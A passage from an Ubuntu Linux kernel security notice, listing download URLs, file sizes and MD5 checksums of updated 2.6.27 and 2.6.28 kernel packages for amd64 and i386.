http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   158612 41ad14f42d1627b98743f27cca6e079a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    46336 84974022681fc77befeab611c3000268\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   154230 f174230ab8387aaa830e47f87f5ff6dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   313114 2c12623b64944ff4a5d41c02b0e29f49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:  2602540 19c88c75ddeb7b00581acd4f82ecdf11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.46_amd64.deb\n      Size/MD5:   662598 7319f0b08e61ba8702ec08a5ee9e17c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.46_amd64.deb\n      Size/MD5:   662580 491d733eeaedf583b867c4d4ced2ff06\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.46_amd64.deb\n      Size/MD5: 23071578 6c4a2cea6017a189e8bb918b31b21c04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.46_amd64.deb\n      Size/MD5: 23073538 cfe81537c74dbf02ea8088c160f93776\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.46_amd64.deb\n      Size/MD5: 10478938 3aa39b34b211b6a823e6641e04dc3cb8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.46_amd64.deb\n      Size/MD5:   676052 2e4a028eaabfdbc05bdf50bf6f4e57d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   434924 e91564db38f3e4dd68661d4fc20176b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   186504 b5cfef7f46e8e4973873044161750832\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   275580 bf8c625a1fd0a3c547ddd2b30efcdd19\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:  1810418 d702cfbaeb8bb19cac6892fa89a11914\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   151340 470b5b0bd6e1d69a65c87e02da0d0805\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   194282 cc5716f24790f28a6d6c5a61428cfc9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   168190 da5aee00ad2057358eff2fafdadfbecc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    36428 58dc104a0f87bffa8d41c74ac1874b1a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    83446 9bfa83f9fbd2b05cd228308a4440986b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    71998 dbb700adaca55d119a48f38ce6f2fc36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    23240 6d08f177e4bb1f124f5d3d00558f7bf9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:     9012 9be136eca401f0a5edcd9472682edf0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    68532 db6ba2efada864c2755a0086dec26a1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   110306 f822bc6479324326c6aa73491090396d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:  1276204 57f7538e075d482e1f75650c31be6079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    47608 81cb320a32e948efa3ce9934af92b1f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    13474 f8ad1b9785071af2fcd4a6a68d281326\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   393976 03badba78894595caaece71168cb2401\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:   200800 634c45d6c6fb964760b3cdbeef36ac50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb\n      Size/MD5:    13614 aabebd73ef69a1ec4ff071c7dcc47e25\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    33948 39d43c0cc53106e077047ee9f8418c16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   244720 006b19814df01a3ed77bbea227d9d21e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    55396 b04438d274d36e4aa96867d05e64bdaf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    41214 45ca536a01a114e5c465bc9c107016ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    48694 2d17fd3dd01bf5ac57e40b7e25b0fba3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    86926 42fa1fac04021291a1562b73b71f4bd2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    34062 dc4d0bb52d953038a3a04d2572487d08\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   675492 08ca7d68eac62c911702cd93e0dd39e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   158400 55e9fb15c4458498eeb24eb651261530\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    43618 ecc79e7ebd7e9d4705274b0ed05460a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   145226 8eaffa48d78e43750bb098392204d402\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   302410 d7090f3a8a1883a71c229c12b35b3de4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:  2436642 fcd7d906c465fb4a4539b9660736869a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.46_i386.deb\n      Size/MD5:   644562 4f1133627198e4a74facb93a58b4dd06\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.46_i386.deb\n      Size/MD5:   645762 c1a233a090e1234c635f23644a28ef74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.46_i386.deb\n      Size/MD5: 23500370 04213d97c4e479226e65387b81595f78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.46_i386.deb\n      Size/MD5: 23631924 6fd10b5f2b25d3ac14ca2b2ada21e655\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.46_i386.deb\n      Size/MD5: 10116904 397534c43f8a7706b347017ef76d469b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.46_i386.deb\n      Size/MD5:   676058 a2c6ee0e3be368f264330920711e72aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   433072 1e7fd0062b5a0d77034b4578bfd26e12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   171304 18959979b6863d1fd1de6b6245cb837a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   264114 d07d84ba9b972cebfda02c7fd4a7bdbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:  1994328 f7813840fa92245b20d196a264f75f64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   150964 9ebb19c8d243fa58c504de8dd20e6541\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   184054 488503b9f740847ceadce9ffecf619bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   157848 baa2be6c6cd11996db26cedd0ac6cf20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    34504 ac847847da2ecb11859b4f0a96527dfe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    78278 eecd9f3611c7b156ee20d3ba5ab2d149\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    86192 1504465ed8849a5b8d4d6388b19324d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    51330 53afcbc4d209701220fdb808589c62f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:     8798 35d104661e40cbd412298c6e90e81bf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    64328 9f5b81e91df8297bf40b0388f2af4041\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   102108 49fb45b7254f059951ead5a5339c2ef7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:  1450218 78bcdd7f5f2f3223d11c97c1da4db5f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    44526 f2bac43d91e5e4a406130e969fbd3fea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    12640 076f896c619948cd532cd4add10c37b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   373184 f290323f15620846c5552c0134eabd7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:   189718 00313ef10e965d88d39d00dc36a9d41c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb\n      Size/MD5:    12986 9561f6dd8ce0995cee01cf9652d2e4b7\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.60.diff.gz\n      Size/MD5:  7397368 c8ad18574c31b7a63f6f5c7a60843164\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.60.dsc\n      Size/MD5:     3175 2c4ae6fb41ce5c96725b9aba705987a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.60_all.deb\n      Size/MD5:  3637058 9dec78fd6960d3b0646d8f0dc72cc5e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.60_all.deb\n      Size/MD5:  8701332 3ef361a5566e8345b3153dc68d9136f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.60_all.deb\n      Size/MD5: 57050918 907814e5a234539354a540f6489534cd\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   234604 53a2bff8a62ce01a44f0e00a308dbf1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    44114 333413e67615ddeda779499ad9e4a43a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    43320 65a39dbb66ea99a5a79e3d5e1a346456\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    51122 988d9b26f215a72f808a224bc36a6e1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    90090 30a652ac65d62e4155c83688402c8067\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    38016 332e9294ce3f61519dd5290ec635c24b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   521628 79ca320def43b0d474393ef7ab73aa88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   125834 ddd3eb4fb0e0f172ece195c3a9476d40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    58070 4d27a900d517cd310e6118466ed71bd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   312518 1e1213e9da7c64d3234ef894e8041616\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:  3870038 d659531b6f70c931945d661324479876\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.60_amd64.deb\n      Size/MD5:   689366 06a5d59ba63c3e4657699434dfddaf31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.60_amd64.deb\n      Size/MD5:   689360 c5b01e691f1f85e7e011f5353c2e1f0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.60_amd64.deb\n      Size/MD5: 24340210 f6d36308201e439213d75fe89d1f949d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.60_amd64.deb\n      Size/MD5: 24334604 22f99c6c0a710dd3d042e7a2e4265d4b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.60_amd64.deb\n      Size/MD5: 10551528 e3393a5719e07dc10fd7e67caddd71ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_amd64.deb\n      Size/MD5:   766410 b1b8ed1bf99588cd234faa8754331219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   215198 bd56f1b146a6a266e7d33d479a56c3fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   189504 56ec878057a6728811eb569171dd8989\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    29406 924bb46c31469545b2f9b5a69ecfd3c6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   274466 0d5c624d5fc036197f0b38346e7056bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:  1933830 9e64ca55e2b733384943bfda311e2cca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   163478 7c8cdeafc20c3e2e55d4b6368ad348be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   194832 95ad3c8c50998a0d57b97a426024d66b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   153012 6981c65957d83e2fc50e67b5feea37fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    36500 e3ddd4487748944bb9e6af11197c452b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:     5838 71b842fed3abfd0e10f45532e72e338a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    72156 6a4846b581e8073b594581393e7f3ea1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    22714 416a39e057492d674ab8fa69e92cc084\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:     8874 ce3f11c073c3adc925e3586daaa3f256\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    47442 f4154e7a797bdb99243fb42b281e7dd0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    15658 4717f9a5625e9865d7770f16aa8b9694\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:  1273644 885f048625f63743d42c7984e8f5465d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    47210 b4b171d4d29e8af25450868b0e5116b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    72708 ff3985dfccb5b6b80cf3b9972ab682cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:   126984 91a505150c214b099359efeb3c533aa5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb\n      Size/MD5:    13474 e2ad8b153b5e6c0d4f6a2727241d8ddb\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   215848 7e88186abd28ffb3e3654dd093004ae3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    46662 a154ceffcd9156175bfa3f9c986c366d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    41350 dd04211a0f405d7862c9089443302ac4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    47400 fa1dd350013b6876bc0d30034b4b7bd0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    86920 5c4e36161fe85f2a958857800e2e409c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    33574 dcfe6680ff2e6c726d97f8a70ab4d9d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   525748 40b74d920dab9092817f7795442d6592\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   125626 eb07a73e676b56dd75596bd744e03792\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    54882 265f29c01ab8f188c84def410ebbc172\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   301356 3e7193de8da02b7b723c79445653c432\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:  3745410 49dcbb598afe6e8912e888f53340f4b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.60_i386.deb\n      Size/MD5:   674134 d74071d14c2b5b9fc1c75e84d991dd71\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.60_i386.deb\n      Size/MD5:   675796 149047440ae084feb9894d759c7b63aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.60_i386.deb\n      Size/MD5: 24659518 575c49bf6d229bdd51f0701548e7f043\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.60_i386.deb\n      Size/MD5: 24774746 3798a1951b896bbff4fc46c611292510\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.60_i386.deb\n      Size/MD5: 10249078 15afc86c39ad73ab34b824eaa78ef4b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_i386.deb\n      Size/MD5:   766376 0d9edf49feedd8b599e2b30b2eb04c42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   218104 9eec41a2e255bdd89fbf99e11487f8f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   174930 4d40c9bb93f72fea91add90c7505e080\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    30058 5c81aa2bdefc2f94d3529ce108e8f746\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   262822 e5114f9458fe769969d45d81af460545\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:  2109984 a44d3578f4ab6dbcaf93eb338c31b5de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   150238 fde1cf1d54665b1152898d383b4fbd4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   184330 f629a9074e10ea729bb40ed8bcfd016b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:   143580 7357996698e948fb18cf9dc46eeece0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    34576 7ba16717d6e47712637622673c90f3b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:     5502 b93b233830ad9076ceac6ee65dd77495\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    86008 202793c9a60b14b0da90e284858ee2d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    47636 fe5142ee6e8661c795dea7642ebd69ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:     8714 fc1cc26aa34730c3a5e8e6fb5ae284e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    44694 c0227d7df6c44ff0b9b339bb0b8718f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    14778 808796cd5c8f57330fd3fa0eea55de3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:  1445970 818de3e1c47c9c61fba615d83cee21db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb\n      Size/MD5:    44102 